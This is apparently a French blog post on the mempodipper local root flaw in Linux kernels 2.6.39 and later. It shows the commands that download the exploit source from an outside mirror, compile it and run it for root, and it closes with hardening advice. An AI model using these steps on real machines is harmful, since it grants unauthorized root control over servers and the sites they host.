Une nouvelle faille de sécurité local root exploit vient d’être découverte dans le noyau Linux.


Q’est ce que ça veut dire local root exploit ?

Local root exploit c’est une faille qui permet à n’importe quel utilisateur de devenir root. L’exploit permet ainsi à un simple utilisateur de prendre les privilèges d’un super utilisateur sur une machine en executant simplement  un fichier sur ce dernier.

Ma distribution linux est ils concerné ?

Toutes les distributions contenant un noyau Linux dont la version est égale ou supérieure à la 2.6.39 est concernée. Les dernières versions Red Hat, Centos, backtrack 5 R1 et d’autres seraient concernées.

Comment connaître la version du noyau linux de ma distribution ?

Pour savoir la version du noyau linux de votre distribution tapez dans une console la commande suivante :

# uname -r

Comment utiliser cet exploit ?

Pour ma part, j’ai testé avec succès cette méthode sur une machine virtuelle qui tourne sous backtrack 5. Voici un exemple d’utilisation:

Tout d’abord nous allons se connecter avec un simple utilisateur avec la commande:

Puis nous allons télécharger l’exploit :

# wget http://packetstorm.unixteacher.org/1201-exploits/mempodipper.c

Ensuite on le compile et on exécutera ce dernier comme ceci:

# gcc mempodipper.c -o mempodipper
#./mempodipper

 

Et voila nous avons maintenant l’accès root a partir d’un simple utilisateur ahmed. 🙂 Cette faille est plus dangereuse qu’il n’y paraît.

Imaginez un hacker a réussi à pirater un site web (sous domaine) hébergé sur ton serveur après il a eu les accès de l’utilisateur de ce site et a cause de cette faille dans le noyau, le hacker pourra alors prendre le contrôle total du serveur et de tous les sites hébergé sur ce dernier. 😀

Comment s’en protéger ?

Voici deux règles de sécurité à ne pas négliger pour des serveurs Linux:

  • Mettre le noyau à jour régulièrement et redémarrer la machine a chaque mise ajour pour que les modifications soient prises en compte.
  • Ne jamais installer de compilateurs sur des serveurs linux (gcc, g++, javac …)

1 Commentaire